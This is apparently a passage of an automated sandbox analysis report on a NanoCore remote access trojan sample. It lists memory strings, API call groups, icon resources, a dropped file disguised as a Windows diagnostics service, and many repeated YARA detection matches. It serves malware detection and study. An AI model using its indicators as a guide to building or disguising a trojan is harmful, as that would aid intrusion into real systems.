        Source: DiagnosticsHub.StandardCollector.Service.exe.bat, 0000000C.00000003.298583525.00000000035B5000.00000004.00000001.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeString found in binary or memory: This is a third-party compiled AutoIt script.
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04EB131A NtQuerySystemInformation,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04EB12DF NtQuerySystemInformation,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04EB131A NtQuerySystemInformation,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04EB12DF NtQuerySystemInformation,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A240B1: CreateFileW,DeviceIoControl,CloseHandle,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A240B1: CreateFileW,DeviceIoControl,CloseHandle,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A18858 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A18858 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E33C7
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009D4140
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E2405
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F6522
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A40665
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F267E
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E283A
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F89DF
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A40AE2
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A28B13
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009ECD61
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F7006
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009D3190
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009D710E
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C1287
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009EF419
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E16C4
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E1BB8
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F9D05
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E33C7
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009D4140
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E2405
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F6522
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A40665
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F267E
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E283A
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F89DF
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A40AE2
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A28B13
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009ECD61
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F7006
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009D3190
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009D710E
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C1287
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009EF419
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E16C4
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E1BB8
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F9D05
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00E07AC1
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04D7B068
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04D78798
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04D723A0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04D72FA8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04D7945F
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04D7306F
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04D79398
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 4_2_04A201B7
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009B7006
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_00993190
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_0099710E
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_00994140
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_00981287
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009AF419
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009B6522
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009A16C4
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009B267E
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009B89DF
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009E8B13
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009B9D05
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009ACD61
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 14_2_02C723A0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 14_2_02C72FA8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 14_2_02C73850
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 14_2_02C7238F
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 14_2_02C7306F
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: String function: 009E0D27 appears 70 times
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: String function: 009C7F41 appears 34 times
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: String function: 009E8B40 appears 40 times
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: String function: 009A8B40 appears 37 times
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: String function: 009E0D27 appears 70 times
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: String function: 009C7F41 appears 34 times
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: String function: 009E8B40 appears 40 times
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dll
        Source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
